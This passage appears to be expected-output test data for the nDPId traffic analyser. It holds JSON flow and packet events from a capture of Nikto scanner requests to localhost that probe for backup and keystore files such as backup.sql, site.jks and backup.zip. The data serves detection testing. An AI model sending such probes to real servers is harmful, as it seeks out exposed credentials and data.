(Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1576420276968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276968,"pkt":"AAAAAAAAAAAAAAAACABFAADA8BJAAEAGTCN\/AAABfwAAAcMGH5DhJMhLysCuKoAYAED+tAAAAQEICp1m\/BCdZvwPR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1576420276969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276969,"pkt":"AAAAAAAAAAAAAAAACABFAADA1ehAAEAGZk1\/AAABfwAAAcMIH5C08u29Z4prKYAYAED+tAAAAQEICp1m\/BGdZvwRR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1576420276970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276970,"pkt":"AAAAAAAAAAAAAAAACABFAADCS3NAAEAG8MB\/AAABfwAAAcMKH5AxI3MswmM4CYAYAED+tgAAAQEICp1m\/BKdZvwSR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1576420276972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276972,"pkt":"AAAAAAAAAAAAAAAACABFAADCyadAAEAGcox\/AAABfwAAAcMMH5BpA\/H\/vohuZIAYAED+tgAAAQEICp1m\/BSdZvwUR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1576420276973,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276973,"pkt":"AAAAAAAAAAAAAAAACABFAADA+8hAAEAGQG1\/AAABfwAAAcMOH5CJ5sOeTDtcfYAYAED+tAAAAQEICp1m\/BWdZvwVR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1576420276976,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276976,"pkt":"AAAAAAAAAAAAAAAACABFAADABYdAAEAGNq9\/AAABfwAAAcMQH5AThT3a7QA3zYAYAED+tAAAAQEICp1m\/BidZvwYR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1576420276977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276977,"pkt":"AAAAAAAAAAAAAAAACABFAADBYiVAAEAG2g9\/AAABfwAAAcMSH5B68lqAEiH3Y4AYAED+tQAAAQEICp1m\/BmdZvwZR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1576420276980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276980,"pkt":"AAAAAAAAAAAAAAAACABFAADBB+JAAEAGNFN\/AAABfwAAAcMUH5Dk6j++IkHQl4AYAED+tQAAAQEICp1m\/BydZvwcR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1576420276982,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276982,"pkt":"AAAAAAAAAAAAAAAACABFAAC98llAAEAGSd9\/AAABfwAAAcMWH5DjKcoLls+qsoAYAED+sQAAAQEICp1m\/B6dZvwdR0VUIC8xLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1576420276983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276983,"pkt":"AAAAAAAAAAAAAAAACABFAAC9nNlAAEAGn19\/AAABfwAAAcMYH5CM06SLK3vm\/IAYAED+sQAAAQEICp1m\/B+dZvwfR0VUIC8xLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1576420276985,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276985,"pkt":"AAAAAAAAAAAAAAAACABFAADCh5hAAEAGtJt\/AAABfwAAAcMaH5DK+b\/J7Nxpa4AYAED+tgAAAQEICp1m\/CGdZvwgR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 